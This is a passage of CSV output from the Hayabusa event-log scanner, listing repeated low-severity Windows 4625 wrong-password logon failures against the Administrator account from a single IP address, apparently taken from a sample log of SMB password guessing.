NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: 